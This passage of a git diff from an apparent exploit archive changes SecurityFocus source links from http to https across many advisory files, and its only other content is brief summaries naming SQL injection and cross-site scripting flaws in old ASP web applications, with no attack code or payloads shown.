ASP.NET converts Unicode characters ranging from U+ff00-U+ff60 to ASCII. diff --git a/exploits/asp/webapps/25148.txt b/exploits/asp/webapps/25148.txt index 80356522e..8992c52b8 100644 --- a/exploits/asp/webapps/25148.txt +++ b/exploits/asp/webapps/25148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12626/info +source: https://www.securityfocus.com/bid/12626/info It is reported that Mono is prone to various cross-site scripting attacks. These issues result from insufficient sanitization of user-supplied data and arise when Mono converts Unicode characters ranging from U+ff00-U+ff60 to ASCII. diff --git a/exploits/asp/webapps/25233.txt b/exploits/asp/webapps/25233.txt index bb7cf0310..0980a9a10 100644 --- a/exploits/asp/webapps/25233.txt +++ b/exploits/asp/webapps/25233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12836/info +source: https://www.securityfocus.com/bid/12836/info ACS Blog is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25252.txt b/exploits/asp/webapps/25252.txt index ca049e439..0fa23ff68 100644 --- a/exploits/asp/webapps/25252.txt +++ b/exploits/asp/webapps/25252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12861/info +source: https://www.securityfocus.com/bid/12861/info betaparticle blog is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/asp/webapps/25253.txt b/exploits/asp/webapps/25253.txt index c453a00c6..18bc3dbef 100644 --- a/exploits/asp/webapps/25253.txt +++ b/exploits/asp/webapps/25253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12861/info +source: https://www.securityfocus.com/bid/12861/info betaparticle blog is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/asp/webapps/25254.txt b/exploits/asp/webapps/25254.txt index f72f6bc60..9a494a47f 100644 --- a/exploits/asp/webapps/25254.txt +++ b/exploits/asp/webapps/25254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12861/info +source: https://www.securityfocus.com/bid/12861/info betaparticle blog is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/asp/webapps/25313.txt b/exploits/asp/webapps/25313.txt index fed6f5e64..9d59a3fa6 100644 --- a/exploits/asp/webapps/25313.txt +++ b/exploits/asp/webapps/25313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12921/info +source: https://www.securityfocus.com/bid/12921/info ACS Blog is affected by an HTML injection vulnerability. diff --git a/exploits/asp/webapps/25318.txt b/exploits/asp/webapps/25318.txt index 59cc8d1bb..c2217bbe3 100644 --- a/exploits/asp/webapps/25318.txt +++ b/exploits/asp/webapps/25318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12936/info +source: https://www.securityfocus.com/bid/12936/info Multiple input-validation vulnerabilities reportedly affect PortalApp. These issues occur due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/asp/webapps/25324.txt b/exploits/asp/webapps/25324.txt index c496c9482..9be411085 100644 --- a/exploits/asp/webapps/25324.txt +++ b/exploits/asp/webapps/25324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12958/info +source: https://www.securityfocus.com/bid/12958/info XM Forum is reported prone to a script injection vulnerability. diff --git a/exploits/asp/webapps/25332.txt b/exploits/asp/webapps/25332.txt index 3f40b3288..8676437e9 100644 --- a/exploits/asp/webapps/25332.txt +++ b/exploits/asp/webapps/25332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12985/info +source: https://www.securityfocus.com/bid/12985/info SiteEnable is reported prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/25346.txt b/exploits/asp/webapps/25346.txt index 3084cd1e9..db6424c14 100644 --- a/exploits/asp/webapps/25346.txt +++ b/exploits/asp/webapps/25346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13032/info +source: https://www.securityfocus.com/bid/13032/info Active Auction House is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25347.txt b/exploits/asp/webapps/25347.txt index 82a0813a2..bcb058a15 100644 --- a/exploits/asp/webapps/25347.txt +++ b/exploits/asp/webapps/25347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13034/info +source: https://www.securityfocus.com/bid/13034/info Active Auction House is reportedly affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in a SQL query. diff --git a/exploits/asp/webapps/25348.txt b/exploits/asp/webapps/25348.txt index a98536cc0..273019a09 100644 --- a/exploits/asp/webapps/25348.txt +++ b/exploits/asp/webapps/25348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13036/info +source: https://www.securityfocus.com/bid/13036/info Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25349.txt b/exploits/asp/webapps/25349.txt index e41070d6b..f67ee8d7d 100644 --- a/exploits/asp/webapps/25349.txt +++ b/exploits/asp/webapps/25349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13036/info +source: https://www.securityfocus.com/bid/13036/info Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25351.txt b/exploits/asp/webapps/25351.txt index aacceec7b..b1af60b39 100644 --- a/exploits/asp/webapps/25351.txt +++ b/exploits/asp/webapps/25351.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13038/info +source: https://www.securityfocus.com/bid/13038/info Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25352.txt b/exploits/asp/webapps/25352.txt index d0b7ee19b..79d6765a0 100644 --- a/exploits/asp/webapps/25352.txt +++ b/exploits/asp/webapps/25352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13039/info +source: https://www.securityfocus.com/bid/13039/info Active Auction House is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25390.txt b/exploits/asp/webapps/25390.txt index 72ac935e4..1d7b35840 100644 --- a/exploits/asp/webapps/25390.txt +++ b/exploits/asp/webapps/25390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13125/info +source: https://www.securityfocus.com/bid/13125/info Comersus Cart is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly validate user-supplied input. diff --git a/exploits/asp/webapps/25424.txt b/exploits/asp/webapps/25424.txt index cc59c9b4f..4e464ecd0 100644 --- a/exploits/asp/webapps/25424.txt +++ b/exploits/asp/webapps/25424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13181/info +source: https://www.securityfocus.com/bid/13181/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25425.txt b/exploits/asp/webapps/25425.txt index c3ef7fe43..096fdc1a7 100644 --- a/exploits/asp/webapps/25425.txt +++ b/exploits/asp/webapps/25425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13182/info +source: https://www.securityfocus.com/bid/13182/info OneWorldStore is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25426.txt b/exploits/asp/webapps/25426.txt index e83db4364..82abc0c5b 100644 --- a/exploits/asp/webapps/25426.txt +++ b/exploits/asp/webapps/25426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13183/info +source: https://www.securityfocus.com/bid/13183/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25427.txt b/exploits/asp/webapps/25427.txt index e6d10e69a..931405077 100644 --- a/exploits/asp/webapps/25427.txt +++ b/exploits/asp/webapps/25427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13184/info +source: https://www.securityfocus.com/bid/13184/info OneWorldStore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25428.txt b/exploits/asp/webapps/25428.txt index 087f7f1e8..53ced7ac5 100644 --- a/exploits/asp/webapps/25428.txt +++ b/exploits/asp/webapps/25428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13185/info +source: https://www.securityfocus.com/bid/13185/info OneWorldStore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25455.txt b/exploits/asp/webapps/25455.txt index 6a6f60bc0..d04d4c80b 100644 --- a/exploits/asp/webapps/25455.txt +++ b/exploits/asp/webapps/25455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13249/info +source: https://www.securityfocus.com/bid/13249/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25456.txt b/exploits/asp/webapps/25456.txt index 0ed1628ec..65a7bca4c 100644 --- a/exploits/asp/webapps/25456.txt +++ b/exploits/asp/webapps/25456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13251/info +source: https://www.securityfocus.com/bid/13251/info OneWorldStore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25466.txt b/exploits/asp/webapps/25466.txt index 1cc0d3840..867e92567 100644 --- a/exploits/asp/webapps/25466.txt +++ b/exploits/asp/webapps/25466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13274/info +source: https://www.securityfocus.com/bid/13274/info EcommProV3 is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25476.txt b/exploits/asp/webapps/25476.txt index 54858c2e0..f9eb3cdae 100644 --- a/exploits/asp/webapps/25476.txt +++ b/exploits/asp/webapps/25476.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25477.txt b/exploits/asp/webapps/25477.txt index 9e14fa450..005d6d95b 100644 --- a/exploits/asp/webapps/25477.txt +++ b/exploits/asp/webapps/25477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25478.txt b/exploits/asp/webapps/25478.txt index bb21927de..a7109839b 100644 --- a/exploits/asp/webapps/25478.txt +++ b/exploits/asp/webapps/25478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25479.txt b/exploits/asp/webapps/25479.txt index 11f4f07ad..0669be602 100644 --- a/exploits/asp/webapps/25479.txt +++ b/exploits/asp/webapps/25479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25480.txt b/exploits/asp/webapps/25480.txt index 4b95bbde9..4a3cd506e 100644 --- a/exploits/asp/webapps/25480.txt +++ b/exploits/asp/webapps/25480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25481.txt b/exploits/asp/webapps/25481.txt index ec0146ca4..fabf5b316 100644 --- a/exploits/asp/webapps/25481.txt +++ b/exploits/asp/webapps/25481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25482.txt b/exploits/asp/webapps/25482.txt index 60cdc8daf..4836290b3 100644 --- a/exploits/asp/webapps/25482.txt +++ b/exploits/asp/webapps/25482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25483.txt b/exploits/asp/webapps/25483.txt index 413c9de5b..a11b65a5f 100644 --- a/exploits/asp/webapps/25483.txt +++ b/exploits/asp/webapps/25483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25484.txt b/exploits/asp/webapps/25484.txt index 5d00142fd..99e9cfde4 100644 --- a/exploits/asp/webapps/25484.txt +++ b/exploits/asp/webapps/25484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25485.txt b/exploits/asp/webapps/25485.txt index be37ad508..ff25b1c71 100644 --- a/exploits/asp/webapps/25485.txt +++ b/exploits/asp/webapps/25485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25498.txt b/exploits/asp/webapps/25498.txt index 35d0d5c27..a64439eb7 100644 --- a/exploits/asp/webapps/25498.txt +++ b/exploits/asp/webapps/25498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13315/info +source: https://www.securityfocus.com/bid/13315/info ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25500.txt b/exploits/asp/webapps/25500.txt index 19da74161..58119b1e2 100644 --- a/exploits/asp/webapps/25500.txt +++ b/exploits/asp/webapps/25500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13317/info +source: https://www.securityfocus.com/bid/13317/info ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25501.txt b/exploits/asp/webapps/25501.txt index 80d9425c7..8d541b073 100644 --- a/exploits/asp/webapps/25501.txt +++ b/exploits/asp/webapps/25501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13319/info +source: https://www.securityfocus.com/bid/13319/info ASPNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25502.txt b/exploits/asp/webapps/25502.txt index 0b88142c0..d4fb62dfe 100644 --- a/exploits/asp/webapps/25502.txt +++ b/exploits/asp/webapps/25502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13320/info +source: https://www.securityfocus.com/bid/13320/info ASPNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25504.txt b/exploits/asp/webapps/25504.txt index b0889f6b4..b8514632b 100644 --- a/exploits/asp/webapps/25504.txt +++ b/exploits/asp/webapps/25504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13327/info +source: https://www.securityfocus.com/bid/13327/info Black Knight Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25505.txt b/exploits/asp/webapps/25505.txt index 4740a0b6a..e66058c95 100644 --- a/exploits/asp/webapps/25505.txt +++ b/exploits/asp/webapps/25505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13328/info +source: https://www.securityfocus.com/bid/13328/info Black Knight Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25506.txt b/exploits/asp/webapps/25506.txt index 44ed295eb..e8c42af55 100644 --- a/exploits/asp/webapps/25506.txt +++ b/exploits/asp/webapps/25506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13330/info +source: https://www.securityfocus.com/bid/13330/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25507.txt b/exploits/asp/webapps/25507.txt index 5cdff5eb0..a10175a0e 100644 --- a/exploits/asp/webapps/25507.txt +++ b/exploits/asp/webapps/25507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13331/info +source: https://www.securityfocus.com/bid/13331/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25508.txt b/exploits/asp/webapps/25508.txt index 4f58f8ea2..b37d2dd00 100644 --- a/exploits/asp/webapps/25508.txt +++ b/exploits/asp/webapps/25508.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13332/info +source: https://www.securityfocus.com/bid/13332/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25509.txt b/exploits/asp/webapps/25509.txt index 6f52725e0..d9f89f493 100644 --- a/exploits/asp/webapps/25509.txt +++ b/exploits/asp/webapps/25509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13333/info +source: https://www.securityfocus.com/bid/13333/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25510.txt b/exploits/asp/webapps/25510.txt index 2f4af8343..cd14e0523 100644 --- a/exploits/asp/webapps/25510.txt +++ b/exploits/asp/webapps/25510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13334/info +source: https://www.securityfocus.com/bid/13334/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25511.txt b/exploits/asp/webapps/25511.txt index d82fd299b..a1d299c4f 100644 --- a/exploits/asp/webapps/25511.txt +++ b/exploits/asp/webapps/25511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13335/info +source: https://www.securityfocus.com/bid/13335/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25512.txt b/exploits/asp/webapps/25512.txt index 1f933b7ab..bfd1f391e 100644 --- a/exploits/asp/webapps/25512.txt +++ b/exploits/asp/webapps/25512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13336/info +source: https://www.securityfocus.com/bid/13336/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25513.txt b/exploits/asp/webapps/25513.txt index e12f96015..bf5448fe0 100644 --- a/exploits/asp/webapps/25513.txt +++ b/exploits/asp/webapps/25513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13337/info +source: https://www.securityfocus.com/bid/13337/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25514.txt b/exploits/asp/webapps/25514.txt index cdf6516f8..8c5c44279 100644 --- a/exploits/asp/webapps/25514.txt +++ b/exploits/asp/webapps/25514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13338/info +source: https://www.securityfocus.com/bid/13338/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25515.txt b/exploits/asp/webapps/25515.txt index 4d7821eaf..df8a5b3d0 100644 --- a/exploits/asp/webapps/25515.txt +++ b/exploits/asp/webapps/25515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13339/info +source: https://www.securityfocus.com/bid/13339/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25516.txt b/exploits/asp/webapps/25516.txt index 08e5a5ab4..e372f3c7b 100644 --- a/exploits/asp/webapps/25516.txt +++ b/exploits/asp/webapps/25516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13340/info +source: https://www.securityfocus.com/bid/13340/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25520.txt b/exploits/asp/webapps/25520.txt index ccedca4be..75997f1e6 100644 --- a/exploits/asp/webapps/25520.txt +++ b/exploits/asp/webapps/25520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13341/info +source: https://www.securityfocus.com/bid/13341/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25521.txt b/exploits/asp/webapps/25521.txt index ed4ded5c9..d21a5b9e1 100644 --- a/exploits/asp/webapps/25521.txt +++ b/exploits/asp/webapps/25521.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13342/info +source: https://www.securityfocus.com/bid/13342/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25522.txt b/exploits/asp/webapps/25522.txt index ccdac48cd..7baa18564 100644 --- a/exploits/asp/webapps/25522.txt +++ b/exploits/asp/webapps/25522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13343/info +source: https://www.securityfocus.com/bid/13343/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25529.txt b/exploits/asp/webapps/25529.txt index 5e6ed44d7..630d09547 100644 --- a/exploits/asp/webapps/25529.txt +++ b/exploits/asp/webapps/25529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13358/info +source: https://www.securityfocus.com/bid/13358/info StorePortal is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25530.txt b/exploits/asp/webapps/25530.txt index 8c5fbcc14..87d9e6a72 100644 --- a/exploits/asp/webapps/25530.txt +++ b/exploits/asp/webapps/25530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13361/info +source: https://www.securityfocus.com/bid/13361/info OneWorldStore is prone to an information disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25536.txt b/exploits/asp/webapps/25536.txt index 352d18f5a..78dd87305 100644 --- a/exploits/asp/webapps/25536.txt +++ b/exploits/asp/webapps/25536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13376/info +source: https://www.securityfocus.com/bid/13376/info An SQL injection vulnerability affects MetaCart e-Shop V-8. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25537.txt b/exploits/asp/webapps/25537.txt index 899426599..ec8be8724 100644 --- a/exploits/asp/webapps/25537.txt +++ b/exploits/asp/webapps/25537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13377/info +source: https://www.securityfocus.com/bid/13377/info An SQL injection vulnerability affects MetaCart e-Shop V-8. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25539.txt b/exploits/asp/webapps/25539.txt index a84cd6964..7f8ba3494 100644 --- a/exploits/asp/webapps/25539.txt +++ b/exploits/asp/webapps/25539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13382/info +source: https://www.securityfocus.com/bid/13382/info A remote SQL-injection vulnerability affects MetaCart2 because the application fails to properly sanitize user-supplied input before including it in SQL queries. diff --git a/exploits/asp/webapps/25540.txt b/exploits/asp/webapps/25540.txt index 81f590d93..d294f77f8 100644 --- a/exploits/asp/webapps/25540.txt +++ b/exploits/asp/webapps/25540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13383/info +source: https://www.securityfocus.com/bid/13383/info A remote SQL injection vulnerability affects MetaCart2. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25541.txt b/exploits/asp/webapps/25541.txt index 1d2a06181..bf13b12a8 100644 --- a/exploits/asp/webapps/25541.txt +++ b/exploits/asp/webapps/25541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13384/info +source: https://www.securityfocus.com/bid/13384/info A remote SQL injection vulnerability affects MetaCart2. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25542.txt b/exploits/asp/webapps/25542.txt index b04ed60bd..8b8cdb060 100644 --- a/exploits/asp/webapps/25542.txt +++ b/exploits/asp/webapps/25542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13385/info +source: https://www.securityfocus.com/bid/13385/info A remote SQL injection vulnerability affects MetaCart2. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25543.txt b/exploits/asp/webapps/25543.txt index b8a2aa3fd..6fd5b30c6 100644 --- a/exploits/asp/webapps/25543.txt +++ b/exploits/asp/webapps/25543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13393/info +source: https://www.securityfocus.com/bid/13393/info MetaCart2 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25544.txt b/exploits/asp/webapps/25544.txt index 3ae2d65f3..b0a9322fc 100644 --- a/exploits/asp/webapps/25544.txt +++ b/exploits/asp/webapps/25544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13395/info +source: https://www.securityfocus.com/bid/13395/info A remote SQL injection vulnerability affects MetaBid Auctions. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25585.txt b/exploits/asp/webapps/25585.txt index 61dde7d79..255c857e9 100644 --- a/exploits/asp/webapps/25585.txt +++ b/exploits/asp/webapps/25585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25586.txt b/exploits/asp/webapps/25586.txt index a11f030b2..b26cfa926 100644 --- a/exploits/asp/webapps/25586.txt +++ b/exploits/asp/webapps/25586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25587.txt b/exploits/asp/webapps/25587.txt index 7cd7a00e4..a99c4febc 100644 --- a/exploits/asp/webapps/25587.txt +++ b/exploits/asp/webapps/25587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25588.txt b/exploits/asp/webapps/25588.txt index da54ba159..d1993126b 100644 --- a/exploits/asp/webapps/25588.txt +++ b/exploits/asp/webapps/25588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25589.txt b/exploits/asp/webapps/25589.txt index 15dfba4b7..f26d1c2ef 100644 --- a/exploits/asp/webapps/25589.txt +++ b/exploits/asp/webapps/25589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25595.txt b/exploits/asp/webapps/25595.txt index 